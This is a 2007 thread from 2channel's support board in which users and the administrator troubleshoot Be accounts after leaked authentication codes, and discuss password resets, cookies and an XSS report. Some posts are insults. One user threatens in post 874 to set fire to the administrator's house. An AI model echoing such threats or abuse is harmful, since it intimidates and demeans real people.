相変わらずBE書きこがエラーになるけど
パスワード変えないと書けないの?
0521砂くじら ◆/q8q8/5.5.
垢版 |
2007/11/28(水) 04:44:49ID:lC1efmyH0?DIA(120000)
登録アドレスは変更できないの?
0528 ◆FUJIMAN/GQ
垢版 |
2007/11/28(水) 04:51:14ID:rRDdp90j0?PLT(25554)
>>517
これってもしかして運営に焼かれたbeも復活?
0529動け動けウゴウゴ2ちゃんねる
垢版 |
2007/11/28(水) 04:51:52ID:yMkiwNm20
全然意味わかんないな、どういうことなんだ
>>507でパスワード変えても「修正しました」と出るだけで
>>511で言ってる認証コードが変わるってのは嘘だし
正にパスワードが変わっただけで何一つ変わっていないんだが
0532動け動けウゴウゴ2ちゃんねる
垢版 |
2007/11/28(水) 05:00:48ID:ynxus2zh0
パス変えて、認証コード再送したら今度はこうなったボスケテ

--------------------
書込み中・・・
--------------------
ERROR!
ERROR:Beユーザー情報の取得に失敗しました。(Invalid response)
0534 ◆FUJIMAN/GQ
垢版 |
2007/11/28(水) 05:01:09ID:rRDdp90j0?PLT(25554)
前の認証が使えるんじゃ意味無いwwww
0536動け動けウゴウゴ2ちゃんねる
垢版 |
2007/11/28(水) 05:03:27ID:atnEX2ya0?2BP(3383)
パス変更しても認証コード送られてこないし
前の認証コードで書き込めるよー
0537動け動けウゴウゴ2ちゃんねる
垢版 |
2007/11/28(水) 05:03:32ID:I3HuDW2p0?2BP(1450)
>>534
確かに通る
0538Cooks ◆CoooooksjU
垢版 |
2007/11/28(水) 05:04:01ID:7C7Y3pLQ0
--------------------
書込み中・・・
--------------------
ERROR!
ERROR:Beユーザー情報の取得に失敗しました。(Invalid response)


ぐぇ
前のコード消しちゃった
0547 ◆FUJIMAN/GQ
垢版 |
2007/11/28(水) 05:08:32ID:rRDdp90j0
認証は既に終わっているようです
--------------------------------------------------------------------------------
こちらからログインしてください。



どうやってもコレが出る^^;
0548動け動けウゴウゴ2ちゃんねる
垢版 |
2007/11/28(水) 05:10:39ID:atnEX2ya0?2BP(3383)
まず認証コードが送られてこないんだが?
0550砂くじら ◆/q8q8/5.5.
垢版 |
2007/11/28(水) 05:11:20ID:lC1efmyH0?DIA(120000)
ひろゆきのイライラ度 ★★★★☆☆
0552動け動けウゴウゴ2ちゃんねる
垢版 |
2007/11/28(水) 05:13:16ID:4Ehj/K+w0
ちょっと待て。指摘するならまだしも、ひろゆきが色々やってくれてるのに
それに対して文句いうのやめようぜ。

俺も新しい認証コードをどこで見れるのかがわかりません><;
0553& ◆0KaKbxr9Z2
垢版 |
2007/11/28(水) 05:13:42ID:34Yq5dAY0?S★(725333)
まちがえt新しい認証コードじゃだめだった><
0558動け動けウゴウゴ2ちゃんねる
垢版 |
2007/11/28(水) 05:18:42ID:I3HuDW2p0
新規ユーザー登録で現在の情報を打ち込むと
登録してるメールに送られてくる
0565動け動けウゴウゴ2ちゃんねる
垢版 |
NGNG?2BP(3383)
でも使えないな
0566ひろゆき@どうやら管理人 ★
垢版 |
2007/11/28(水) 05:31:28ID:???0?S★(1012558)
あ、認証コードが変わってなかった、、、

ってことで、なおしました。
0570動け動けウゴウゴ2ちゃんねる
垢版 |
2007/11/28(水) 05:32:45ID:I3HuDW2p0
新たにてs
0571動け動けウゴウゴ2ちゃんねる
垢版 |
NGNG?2BP(3383)
てす
0576動け動けウゴウゴ2ちゃんねる
垢版 |
2007/11/28(水) 05:34:52ID:asw2SG6V0
本当だろうか?疑わしい
0578動け動けウゴウゴ2ちゃんねる
垢版 |
2007/11/28(水) 05:35:34ID:KFii29IE0
--------------------
書込み中・・・
--------------------
ERROR!
ERROR:Beユーザー情報の取得に失敗しました。(Invalid response)


BEだせない
0581動け動けウゴウゴ2ちゃんねる
垢版 |
NGNG?2BP(3383)
ダメだ書けない
0585砂くじら ◆/q8q8/5.5.
垢版 |
2007/11/28(水) 05:43:44ID:lC1efmyH0?DIA(120000)
メアド変更可能マダー
0587ひろゆき@どうやら管理人 ★
垢版 |
2007/11/28(水) 05:44:45ID:???0?S★(1012558)
N速の設定を誰か変えたのかな?
0588動け動けウゴウゴ2ちゃんねる
垢版 |
2007/11/28(水) 05:44:47ID:m7knB/Iy0?PLT(14272)
>>566
そうですか、なんかがっかりしました。
ていうか、ニューそくのかたよくみつけだしたもんだ、
この件でvip板のスレストでどうのってのも
すっかりやり気が失せました。
ま、知らないよりはましだし
0589動け動けウゴウゴ2ちゃんねる
垢版 |
NGNG?2BP(3383)
ひろゆきのイライラ度 ★★★★★☆
0594動け動けウゴウゴ2ちゃんねる
垢版 |
2007/11/28(水) 05:47:56ID:KFii29IE0?2BP(4223)
てs
0604動け動けウゴウゴ2ちゃんねる
垢版 |
2007/11/28(水) 05:56:38ID:KFii29IE0?2BP(4223)
専ブラだと出せない?
0622ひろゆき@どうやら管理人 ★
垢版 |
2007/11/28(水) 06:30:39ID:???0?S★(1012558)
>>618
正解。正解。
0623砂くじら ◆/q8q8/5.5.
垢版 |
2007/11/28(水) 06:31:26ID:lC1efmyH0
>>622
メアドは変更できないのですか?
0626信州人
垢版 |
2007/11/28(水) 06:34:18ID:8aGD3/Wk0?2BP(3334)
>>622
正解て。。。

これニュー速なりにアナウンスせんでいいのかね。
みんなここ観てるんかな?
0627イオナ
垢版 |
2007/11/28(水) 06:35:27ID:zWEW07CRO
ひろゆき、「管理人」としての、貴方に聞きたいことがあるんだけど
お時間よろしいでしょうか?
0631動け動けウゴウゴ2ちゃんねる
垢版 |
2007/11/28(水) 06:37:04ID:fbunFzl+P
>>625 おつおつですー
通り… ますかね?
0632信州人
垢版 |
2007/11/28(水) 06:37:21ID:8aGD3/Wk0?2BP(3334)
>>629
書いた後に気づいた。
世の中には親切さんおるもんだな。
0635イオナ
垢版 |
2007/11/28(水) 06:39:13ID:zWEW07CRO
前言撤回、自己解決しました。
0639動け動けウゴウゴ2ちゃんねる
垢版 |
2007/11/28(水) 06:41:54ID:I3HuDW2p0
>>636
登録できても使えないよ
0643動け動けウゴウゴ2ちゃんねる
垢版 |
2007/11/28(水) 06:45:15ID:yMkiwNm20
>>622
ERROR!
ERROR:Beユーザー情報の取得に失敗しました。(Invalid response)a

パスワード変えて認証コード変えてもこのエラーなんだけどなぜ?
0645動け動けウゴウゴ2ちゃんねる
垢版 |
2007/11/28(水) 06:51:04ID:uk2JBWu30?PLT(18312)
裁判で身に付いた経験ですかね?
人として間違いだろ。そちらの仕組みに問題があったんだからさ。
一言くらいさ「お騒がせしました」あってもバチはあたらないよ
これだからさ。
0648ひろゆき@どうやら管理人 ★
垢版 |
2007/11/28(水) 06:52:56ID:???0?S★(1012558)
「お騒がせしました」
0649動け動けウゴウゴ2ちゃんねる
垢版 |
2007/11/28(水) 06:53:24ID:8igj5YIL0

    §,; ________§; ,
  || §; /    § ヽ  ||
  |~~~§~     §'~~~~~~~|  / ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄
  | ____§/"""ヽ,§_____  | < すいませんでした…
  |__|///(§  §)ノ////|__|///\________
 ⊆___)///ゝ___§ノ/////(____⊇////
 ///////////////ジュ〜////////////
 /////////////////////////////
0650動け動けウゴウゴ2ちゃんねる
垢版 |
2007/11/28(水) 06:53:35ID:7NFzgHAj0
それともフォックスに敵意を抱く運営の奴がbeのバグを意図的に流して
混乱させる内部のしわざか?
スレスト機能はじめたこのタイミングに・・
なんかにおうな
0651動け動けウゴウゴ2ちゃんねる
垢版 |
NGNG?2BP(3383)
>>648
wwwwwwwwwwwwwww

まろゆきー新認証コードじゃあBe付書き込めないぞー
0653動け動けウゴウゴ2ちゃんねる
垢版 |
2007/11/28(水) 06:54:07ID:hayriGHG0
あかん、何回やっても新しい認証コード使えん古いのは使えるのに
みんな新しい認証コード使えてんの?
0654動け動けウゴウゴ2ちゃんねる
垢版 |
2007/11/28(水) 06:54:11ID:xFPY9lsI0
だめだ。新しい認証でも使えない。
ログイン時にエラーがでる。
でもできてる人がいるってことは、俺が悪いのか。
クッキーも消してみたんだけどなぁ・・・

>>648
ほんとおつかれさんです
0655動け動けウゴウゴ2ちゃんねる
垢版 |
2007/11/28(水) 06:54:16ID:I3HuDW2p0
まだ終わってないよ
新しい認証コード使えない
0656信州人
垢版 |
2007/11/28(水) 06:54:34ID:8aGD3/Wk0?2BP(3334)
うわぁ。素直だ。。。
>>651
何回かやったらいけたぞ。理由は知らん。
0659動け動けウゴウゴ2ちゃんねる
垢版 |
NGNG?2BP(3383)
>>657
なるほどJaneからじゃダメなのか・・・それじゃダメじゃんw
0660動け動けウゴウゴ2ちゃんねる
垢版 |
2007/11/28(水) 06:56:12ID:hayriGHG0
>>657
IEのCookie見た?古い認証コードになってない?
俺も出来たと思ってCookie見たら古い認証コードでログインしたことになってたよ
0666動け動けウゴウゴ2ちゃんねる
垢版 |
2007/11/28(水) 06:57:43ID:8igj5YIL0
認証コードでログイン出来ないって書いてあるけど
Cookieに直接書けばログインしたのと同じ状態になるからな
ch森や株の操作が出来そうでちょっと怖いかも
0671信州人
垢版 |
2007/11/28(水) 07:00:54ID:8aGD3/Wk0?2BP(3334)
このポイントって自分で減らす事できるのかな?
ゾロ目にしたいんだけど。
0673動け動けウゴウゴ2ちゃんねる
垢版 |
2007/11/28(水) 07:07:26ID:hayriGHG0
1 パスかえる
http://be.2ch.net/test/editprof.php

2 ログアウト or 手動でCookie消す

3 メアド+新しいパス入力して認証コード送ってもらう
http://be.2ch.net/test/regist.html

4 メアド+送られてきた新しい認証コード入力
http://be.2ch.net/test/a.php

ログイン(゚д゚)ウマー

って手順間違ってる?
どうしても4で新しい認証コード受け付けてくれない
0674信州人
垢版 |
2007/11/28(水) 07:11:08ID:8aGD3/Wk0?2BP(3344)
>>673
んでその認証コードは専ブラには入れたのか?
かちゅ〜しゃだとKatjusha.iniとかに書き込むんだが。
0677肉VIP ◆OOO/nkVIPo
垢版 |
2007/11/28(水) 07:13:03ID:PxAl3RU00

0680動け動けウゴウゴ2ちゃんねる
垢版 |
2007/11/28(水) 07:16:59ID:xFPY9lsI0
俺もLive2chだー。新しい認証コードだと書けない。
古い認証コードだと書ける。
IEや火狐だと、新しいのでも書ける。
0684動け動けウゴウゴ2ちゃんねる
垢版 |
2007/11/28(水) 07:21:08ID:uIo3tej20
>>680
IEやFirefoxでログイン後のcookie見た?古い認証コードになってない?
0686動け動けウゴウゴ2ちゃんねる
垢版 |
2007/11/28(水) 07:22:58ID:uk2JBWu30?PLT(18312)
242 名前: 短大生(アラバマ州)[sage] 投稿日:2007/11/28(水) 07:19:09 ID:aRDu5swr0
新しい認証コードだと書けない。
古い認証コードだと書ける。
IEや火狐だと、新しいのでも書ける。

たぶんみんなこんな状態じゃない?
0689動け動けウゴウゴ2ちゃんねる
垢版 |
2007/11/28(水) 07:26:48ID:xFPY9lsI0
>>684
ほんとだ。クッキーが昔のになってる。
ってことは火狐で書き込めていたのは以前の認証コードだったからなのか。
ということは認証コードがうまく変更できてないのかな
自分で強制的にクッキーを書き換えるってことか・・・
0692砂くじら ◆/q8q8/5.5.
垢版 |
2007/11/28(水) 07:29:17ID:lC1efmyH0?DIA(120000)
tes
0693動け動けウゴウゴ2ちゃんねる
垢版 |
2007/11/28(水) 07:29:28ID:uIo3tej20
>>685
そうなんだけど、漏れた認証コードを新しい認証コードにしたいわけだ
ところがIEや火狐でログインするとcookieに書かれているのは漏れた認証コード
しかも使えてしまう
つまりパスが変わっただけで問題解決になってないんだよな
0699動け動けウゴウゴ2ちゃんねる
垢版 |
2007/11/28(水) 07:39:31ID:xFPY9lsI0
今の状態だと、晒されたメールアドレスと認証コードで他人が書き込みできる状態に
なってるんじゃない?いくら新しい認証コードを手に入れても、前のやつで書き込めちゃうから。
0701動け動けウゴウゴ2ちゃんねる
垢版 |
2007/11/28(水) 07:42:07ID:64fnJpBb0
たらこ解決したと勘違いして寝ちゃった?
もしかして漏れbe焼かれたのが書ける様になって最悪の状況じゃね?
0706ひろゆき@どうやら管理人 ★
垢版 |
2007/11/28(水) 07:52:06ID:???0?S★(1012558)
おいら使えるけどなぁ。
0707動け動けウゴウゴ2ちゃんねる
垢版 |
2007/11/28(水) 07:54:44ID:qFLNXLb+O
>>706うるせえ
0711 ◆kusai/ZzDI
垢版 |
2007/11/28(水) 07:55:35ID:noumaBjr0?S★(713700)
>>705
おはぃよう

>>706
read.cgiのXSSの時にrootさんにメール送ってるから暇なときに対応しといて( ゚д゚)ホスィ…
0713動け動けウゴウゴ2ちゃんねる
垢版 |
2007/11/28(水) 07:55:56ID:5KODcrAG0
>>706
IEでは新しい認証コード認識するよ
2chブラウザでは認識しない
それだけなら良いけど、晒された以前の認証コードも認識しちゃう
認証コードリセットして、新規登録ならわかるんだけど
解決になってない
0716動け動けウゴウゴ2ちゃんねる
垢版 |
2007/11/28(水) 07:59:50ID:xFPY9lsI0
>>713
それたぶん実は新しい認証コードは認識してないと思う。
クッキーが残ってるだけで、以前の認証コードで書き込んでるはず。

> 4 メアド+送られてきた新しい認証コード入力
> http://be.2ch.net/test/a.php

 ↑ここのところで、メールアドレスと新しい認証コードを入力して「登録」ボタンを押すと

 認証は既に終わっているようです
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
ここがどうもうまくいってない気がする・・・認証は既に終わっているようです と出るのは正しいの?
0718愛『爽やかな風に揺られて』 ◆PoorManD1k
垢版 |
NGNG
というか、お試し期間が長すぎるんだよ・・・・・・

金がかかわらないサービスじゃないんだから、少しは真剣にやれよ・・・

オマエはなんでもそういう常識的な事が出来無いんだな・・・・

だからこの掲示板は害悪垂れ流しに利用される・・・というか

そのように利用っして下さい掲示板

なんだよ・・・・恥を知れ>クズ!
0722動け動けウゴウゴ2ちゃんねる
垢版 |
2007/11/28(水) 08:05:19ID:5KODcrAG0
>>716
1回目に新しい認証コード入力した時から
「認証は既に終わっているようです」だったと思う
という事は、以前の認証コードを認識してるって事なのか

新しい認証コードは無意味?
0724ひろゆき@どうやら管理人 ★
垢版 |
2007/11/28(水) 08:05:38ID:???0?S★(1012558)
>>712
なんでそこを使うのかよくわからんです。
0725砂くじら ◆/q8q8/5.5.
垢版 |
2007/11/28(水) 08:06:25ID:lC1efmyH0?DIA(120000)
>>724
昨晩Beメでも相談したのですが、
Be登録メールアドレスの変更はできないのですか。。。
0728動け動けウゴウゴ2ちゃんねる
垢版 |
2007/11/28(水) 08:08:55ID:xFPY9lsI0
>>724
でもメールが送られてきて、「上記のリンクをクリックしてください。」のところをクリックすると
そこに飛ばされるよ。
0730動け動けウゴウゴ2ちゃんねる
垢版 |
2007/11/28(水) 08:10:58ID:ef3i9wft0
ひろゆきが手順示せばいいんじゃね
0731動け動けウゴウゴ2ちゃんねる
垢版 |
2007/11/28(水) 08:11:28ID:uk2JBWu30
新しい認証コードのメールが来る
      ↓
メール本文のリンクをクリックする
      ↓
「既に認証は終わっています」
      ↓
 JaneStyleに登録する
      ↓
 書き込みに失敗する ←☆いまここ
0735動け動けウゴウゴ2ちゃんねる
垢版 |
2007/11/28(水) 08:14:09ID:/wLCrsws0
わーい
ぴろゆきがきたからもう安心だー
0741砂くじら ◆/q8q8/5.5.
垢版 |
2007/11/28(水) 08:17:28ID:lC1efmyH0?DIA(120000)
管理人、メアド変更の件はオールスルー><なんで
0751砂くじら ◆/q8q8/5.5.
垢版 |
2007/11/28(水) 08:23:20ID:lC1efmyH0?DIA(120000)
>>747
http://yutori.2ch.net/test/read.cgi/news4vip/1196205644/
6 名前:以下、名無しにかわりましてVIPがお送りします。[sage] 投稿日:2007/11/28(水) 08:22:04.10 ID:TLZvMA89O ?DIA(298804)
!vip2:stop:
---
グランドプリーストの攻撃
MP50使ってへっぽこの呪文を唱えた
このスレは1回目のダメージを受けた (50/250)
ぼうそうがはじまった!! さらにこのスレは2回目のダメージを受けた (100/250)
0754動け動けウゴウゴ2ちゃんねる
垢版 |
2007/11/28(水) 08:25:34ID:EnqD//zF0
>>733
流れが速いので読まずに書くがきっと同じ人いるはず



つ い で に メ ル ア ド 変 更 で き る よ う に し て ♥
0762ひろゆき@どうやら管理人 ★
垢版 |
2007/11/28(水) 08:34:47ID:???0?S★(1013000)
ブラウザで普通にやって出来ないって人います?
0763動け動けウゴウゴ2ちゃんねる
垢版 |
2007/11/28(水) 08:34:52ID:xFPY9lsI0
大量にBEポイントを所有してるメールアドレスと認証コードをスレタイにしてやがる・・・
悪質なことをやってる。
0767ひろゆき@どうやら管理人 ★
垢版 |
2007/11/28(水) 08:36:47ID:???0?S★(1013000)
ログインするとどうなります?
0769動け動けウゴウゴ2ちゃんねる
垢版 |
2007/11/28(水) 08:37:29ID:xFPY9lsI0
>>762
できないでーす。数時間前はできたと思ったんだけど
クッキーみたら旧認証コード(晒されてる認証コード)で書き込んでいただけでした。
0773動け動けウゴウゴ2ちゃんねる
垢版 |
2007/11/28(水) 08:38:29ID:hayriGHG0
>>767
普通にログインできてbe付けて2chにも書き込めるし
プロフィールの変更画面にも行けます
でもcookieを見ると古い認証コードのままです
0774動け動けウゴウゴ2ちゃんねる
垢版 |
2007/11/28(水) 08:38:58ID:64fnJpBb0
>>762
0783ひろゆき@どうやら管理人 ★
垢版 |
2007/11/28(水) 08:44:40ID:???0?S★(1013000)
ログイン状態なら、パスワード変更に失敗してます。

↓で、パスワードを確認してください。
http://be.2ch.net/test/pass.php
0796動け動けウゴウゴ2ちゃんねる
垢版 |
2007/11/28(水) 08:48:06ID:hayriGHG0
先生ごめんなさい
>>780は嘘です
パス変更した後ログインして >>779を試してました

パス変更後 >>779

> ログインエラー2
>
> こちらからログインしてください。

です
0799動け動けウゴウゴ2ちゃんねる
垢版 |
2007/11/28(水) 08:49:23ID:64fnJpBb0
あれ?>>779 試すのはパス変更後ログアウト状態なの?

だったら>>796と同じく
0803動け動けウゴウゴ2ちゃんねる
垢版 |
2007/11/28(水) 08:52:36ID:urAv/pZd0
フェンリル◆be/xFEN/R. ★
beポイント:0
登録日:2007-07-02
紹介文
僕は・・・過去を断ち切る

交わりざりし生命に今もたらされん刹那の奇跡

血が血を拒む、心が心を砕く

時を経て・・・

神威一閃、刹那の如く神をも穿つ誇り高き殺意の波動に目覚めた神狼フェンリル


  Copyright(c)2007 news4fenrir All Rights Reserved.
0804ひろゆき@どうやら管理人 ★
垢版 |
2007/11/28(水) 08:52:43ID:???0?S★(1013000)
>>796

新passwordでログインしなおしてください。
0807ひろゆき@どうやら管理人 ★
垢版 |
2007/11/28(水) 08:54:31ID:???0?S★(1013000)
パスワードの変更が成功したときは、
「パスワード変更」って出るようにしました。
0808動け動けウゴウゴ2ちゃんねる
垢版 |
2007/11/28(水) 08:54:56ID:wwnm4epv0
>というわけで、ちょっとしたテスト版です。

>不具合ありまくりの可能性が高いので、
>変なことがあっても大きな心で受け止めることの出来る方のみご利用ください


ほほう・・・
0814動け動けウゴウゴ2ちゃんねる
垢版 |
2007/11/28(水) 09:00:09ID:xFPY9lsI0
パスワード変更は以前からきちんとできてましたよ。
パスワード変更後、新しい認証コードを取り寄せると

>入力したメールアドレスは登録済みのようです
>認証コードを再送します。

>登録したメールアドレスに認証コードを送ります。
>数分後にメールをご確認ください。

>メール送信完了

    ↓

>メールが折り返されている場合には、認証コードが正しく入力されていない場合があります。
>正しく入力されていない場合は、メールから認証コードをコピーペーストしてください。
メールを確認後リンク先に飛んで登録を押すと

>認証は既に終わっているようですこちらからログインしてください。
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
となります。
ここがうまくいってない気がします。

パスワード変更後に、取り寄せた新認証コードを登録するときにおかしくなるんです。
0815ひろゆき@どうやら管理人 ★
垢版 |
2007/11/28(水) 09:00:26ID:???0?S★(1013000)
>>811
パスワードの変更に失敗してる予感です。
0816ひろゆき@どうやら管理人 ★
垢版 |
2007/11/28(水) 09:00:57ID:???0?S★(1013000)
「新しい認証コードを取り寄せる」ってなんですか?
0820動け動けウゴウゴ2ちゃんねる
垢版 |
2007/11/28(水) 09:03:48ID:xFPY9lsI0
やばい><;俺のやりかたがおかしいのか><;
新しい認証コード使えた人、以前の認証コードは使えなくなってるか知らせておくれ。
0821動け動けウゴウゴ2ちゃんねる
垢版 |
2007/11/28(水) 09:05:47ID:64fnJpBb0
パス変更してログインしなおすだけでおkなんだね
確認した
0822動け動けウゴウゴ2ちゃんねる
垢版 |
2007/11/28(水) 09:05:52ID:I3HuDW2p0
be新規ユーザー登録から既に登録している情報を登録する

入力したメールアドレスは登録済みのようです
認証コードを再送します。

登録したメールアドレスに認証コードを送ります。
数分後にメールをご確認ください。
メール送信完了

↑これでメールが送られてくる
0823動け動けウゴウゴ2ちゃんねる
垢版 |
2007/11/28(水) 09:08:50ID:uk2JBWu30
>>822
それをやって↓これでるよ。これでいいの?

認証は既に終わっているようです
-----------------------------
こちらからログインしてください。
0824動け動けウゴウゴ2ちゃんねる
垢版 |
2007/11/28(水) 09:09:02ID:64fnJpBb0
旧認証コードが使えないのも確認したぞ
0825ひろゆき@どうやら管理人 ★
垢版 |
2007/11/28(水) 09:10:57ID:???0?S★(1013000)
>>822が何をしてるのかよくわかってないのはおいらだけですか?

0826動け動けウゴウゴ2ちゃんねる
垢版 |
2007/11/28(水) 09:12:15ID:64fnJpBb0
手順は
1
> http://be.2ch.net/test/editprof.php
> まず、パスワードを変更してください。

2
> んで、再ログイン

・Webブラウザはこれで完了

3
宣撫らに使う新認証コードはWebブラウザのクッキーを見るか
http://be.2ch.net/test/regist.html
でメアド+新パス入力して送ってもらう

でおkかな?
0827動け動けウゴウゴ2ちゃんねる
垢版 |
2007/11/28(水) 09:12:41ID:8igj5YIL0
  ____     、 _ _     __         __  _  _ __   __
  ヽ__  ノ     l ヽヽ〉ヽ〉   __| |_  __     __| |_ヽ〉ヽ〉__ ノ   ! |
    _/∠_ __ | |      l__   レ'  | __|__  __|     //   ! |
   l__  /ヽ__)| |         /  /| |ヽ__)| | __  ∠__ ヽ    ! |
    //      | |     __ / | | |     | | |_|     ヽヽ  ! |
    ( (_        | l.__ノヽr' ' 7Vl | r┘└、   | | /L__   r _ ) )└┘
    \__/      ヽ.__ノ 7 /)_) |__| L゚_ノヽ/   |__| l_ノ   ヽ_/  ○
                     /_/
0832動け動けウゴウゴ2ちゃんねる
垢版 |
2007/11/28(水) 09:16:38ID:0+T9EPzA0
>>825
・専用ブラウザでBeを使うには認証コードが必要
・パス変更前の認証コードは焼かれているのであたらしい物がほしい
・新しい認証コードを送ってもらうにはメールしかないのでメールアドレスも変更できるようにしてください
0834動け動けウゴウゴ2ちゃんねる
垢版 |
2007/11/28(水) 09:17:15ID:xFPY9lsI0
あーできたっぽい!
クッキー見たら、晒されてる認証コードと変わってた。
>>619
>>621
で晒されてる人は、クッキーの認証コードと晒されている認証コードが変わってたら
クッキーの認証コードを入れてみるといいかも
0837動け動けウゴウゴ2ちゃんねる
垢版 |
2007/11/28(水) 09:18:39ID:uIo3tej20
さっきまではパス変更しても再ログインしてもブラウザのCookieは旧認証コードのままだったし
こういうやり取りがあったから改めて認証コードを登録する必要があると思っていた

> 618 動け動けウゴウゴ2ちゃんねる sage 2007/11/28(水) 06:27:46 ID:7ePYGac00 [8] ▼
> http://be.2ch.net/test/editprof.php
>
> よーするに罠URL踏んじゃった人は
> パスワードかえて
> 認証コード再送しましょうということか

> 622 ひろゆき@どうやら管理人 ★ 2007/11/28(水) 06:30:39 ID:???0 BE:?-S★(1012558) [0] ▼
> >>618
> 正解。正解。

ひろが今さっき更に直したのか知らんがパス変更して再ログインすれば
ブラウザのCookieに新認証コードがかかれるようになった
0839砂くじら ◆/q8q8/5.5.
垢版 |
2007/11/28(水) 09:19:56ID:lC1efmyH0?DIA(120000)
tes
0840動け動けウゴウゴ2ちゃんねる
垢版 |
2007/11/28(水) 09:20:59ID:z1VbS5AF0
旧アド死んでる場合は変更しようにも、変更申請してる人間が本人かどうか判断できないな
0845844
垢版 |
2007/11/28(水) 09:27:32ID:xFPY9lsI0
あ、ちがう。やっぱり自分でどうやってできたのかわからない。
クッキー見て、晒されてる認証コードと別のになってたから、その認証コードを使ったらいけた感じ。
0848動け動けウゴウゴ2ちゃんねる
垢版 |
2007/11/28(水) 09:31:01ID:xFPY9lsI0
フェンリルのBEポイントsakuられてる。あんなに大量にあったのに。
なんとかしてやってくれ。さすがに荒らしが暴れて、罪もない人間のポイントがsakuられるのは
かわいそうだ。
0849動け動けウゴウゴ2ちゃんねる
垢版 |
2007/11/28(水) 09:32:48ID:uF4OffWw0
荒らしに同情する気はない
散々ν速荒らし、キャプで暴れて規制されまくってただろ
コード漏れたのも狐が彫ったものだし
0853こてはんまん ◆LuvLANRUNQ
垢版 |
2007/11/28(水) 09:37:34ID:F5bdyQLG0
初心者板からきました!!1
罠踏んだ人は>>826のやりかた?
BEで初質板に今書けないとか焼かれたと出るっていう
質問のなかには踏んでない人もいるかと思うんだけど
そういう人はしばらく待てばいいんでしょうか?
0855動け動けウゴウゴ2ちゃんねる
垢版 |
2007/11/28(水) 09:39:12ID:zEOEMCqw0
認証コードの変更はおkみたいだけど晒されたbeはパス(認証コード)を
変更してなかったら使えないようにしてユーザにメールで知らせておく
くらいのことはしたほうがいいんじゃね

転んでも泣かない、ベータ運用だから云々も結構だけどニワンゴで
コード書いてるんなら曲がりなりにも開発者の端くれとしてユーザの為に
考えられることは全部やったほうが良いと思わん?

もう取り掛かってたらごめんちょ
0859動け動けウゴウゴ2ちゃんねる
垢版 |
2007/11/28(水) 09:44:02ID:QcBfOI8A0
ポイントの量しか取り柄のないゴミコテが増えたから、
DIA垢はみんな0にされちまえ。
ほんと最近のクソコテどもはつまらん。
媚びへつらってポイントを享受し、馴れ合うことしか脳のないクズが。
0864動け動けウゴウゴ2ちゃんねる
垢版 |
2007/11/28(水) 09:53:06ID:uk2JBWu30
俺の観察では、こいつが出てくると、くれくれが始まる。


ときわ◇Df.knIsSA. ★
beポイント:7960
登録日:2005-07-30
0867動け動けウゴウゴ2ちゃんねる
垢版 |
2007/11/28(水) 10:07:32ID:Ws11E1jnO
とりあえず落ち着いたみたいだな
ひろゆきお疲れ
0870動け動けウゴウゴ2ちゃんねる
垢版 |
2007/11/28(水) 10:30:58ID:We6jBGbk0
こんな時間にいう奴らがなんでこんな偉そうなんだ?屑め。
0872動け動けウゴウゴ2ちゃんねる
垢版 |
2007/11/28(水) 11:29:07ID:U53MkJ8t0
せっかくprinが規制解除になったのに
肝心のν速が板別規制で書き米ないとは
早急になんとかしてくれたまえ運営のイケメンども
0874フェンリル
垢版 |
2007/11/28(水) 12:06:06ID:KySiAldO0
マジでひろゆき28万ポイント返しやがれ糞が
訴えるぞガチで。
つうか俺のbeにログインしてスレ立てした奴も本気で訴えるわ
てめーがニュー速に糞スレ立てたせーでsakuられただろーが屑


2ch閉鎖の危機に追い込むぞ、もしくは管理人の家に火付けにいくわ

それが嫌なら今週中にポイント戻せよ。
0875動け動けウゴウゴ2ちゃんねる
垢版 |
2007/11/28(水) 12:11:03ID:/wLCrsws0
>>874
つまんね
0876ひろゆき@どうやら管理人 ★
垢版 |
2007/11/28(水) 12:15:55ID:???0?S★(1013000)
>つうか俺のbeにログインしてスレ立てした奴も本気で訴えるわ
訴訟の結果、本人じゃないというのがわかったら、
戻しますよ。
0880動け動けウゴウゴ2ちゃんねる
垢版 |
2007/11/28(水) 12:20:25ID:XAMV2OWl0
さあ、もりさがって
            ま
              い
                り
                 ま
                 し
                  た
0885動け動けウゴウゴ2ちゃんねる
垢版 |
2007/11/28(水) 12:22:58ID:QcBfOI8A0
28万ポイント=2万8千円だろ。

そこのvipクズコテはどうせクレクレでためたポイントだろうし、こんなもんのために
訴訟起こすとか、むしろマイナスになるんじゃないか?w
0887オッサン ◆1.Fuck.nn.
垢版 |
2007/11/28(水) 12:24:40ID:mw+zADomP
おーいひろゆき
問題点ずれてない?
自分のBEポイントが勝手に使われてるのが問題なんじゃね?
認証変更したら前のコード使えなくするのが先だろ
0890フェンリル
垢版 |
2007/11/28(水) 12:28:37ID:KySiAldO0
う・・・・訴訟・・・・?
0891動け動けウゴウゴ2ちゃんねる
垢版 |
2007/11/28(水) 12:32:40ID:Eph+83ebO
フェンリル(笑)
0892動け動けウゴウゴ2ちゃんねる
垢版 |
2007/11/28(水) 12:33:39ID:LCtNAkt20
朝起きてVIPでスレ止めようとしたら1ポイントになってて糞わろたwww
フェンリル(´;ω;`)かわいそうです
0894動け動けウゴウゴ2ちゃんねる
垢版 |
2007/11/28(水) 12:34:53ID:I6l9IpmyO
酉はどうした 酉は
0899柊つかさは俺の嫁 ◆cFtukaSk/A
垢版 |
2007/11/28(水) 12:37:31ID:sXKicrFx0?2BP(306)
 \                    /
   \  丶       i.   |      /     ./       /
    \  ヽ     i.   .|     /    /      /
      \  ヽ    i  |     /   /     /
   \
                                  -‐
  ー
 __          わ た し で す            --
     二          / ̄\           = 二
   ̄            | ^o^ |                 ̄
    -‐           \_/                ‐-

    /
            /               ヽ      \
    /                    丶     \
   /   /    /      |   i,      丶     \
 /    /    /       |    i,      丶     \
0903動け動けウゴウゴ2ちゃんねる
垢版 |
2007/11/28(水) 12:41:19ID:Szd6PY2E0
beなくなったからフェンリルが見えちまうじゃねーか
0904動け動けウゴウゴ2ちゃんねる
垢版 |
2007/11/28(水) 12:42:38ID:9rRSTkZFP
1年間sakuって貯めたポイントがあるなら、
正月イベントでお年玉として、BE板の書き込みからランダムに10人くらい選んで
どーんとポイントプレゼントとかすればいいのに。
0905動け動けウゴウゴ2ちゃんねる
垢版 |
2007/11/28(水) 12:43:50ID:gowse2CN0
フェンリルのポイントってはじめは50万あったんだよな
それが一日たらずで0ってwwwwwwwwwwwwwwwwwwwwwwwww
0906砂くじら ◆/q8q8/5.5.
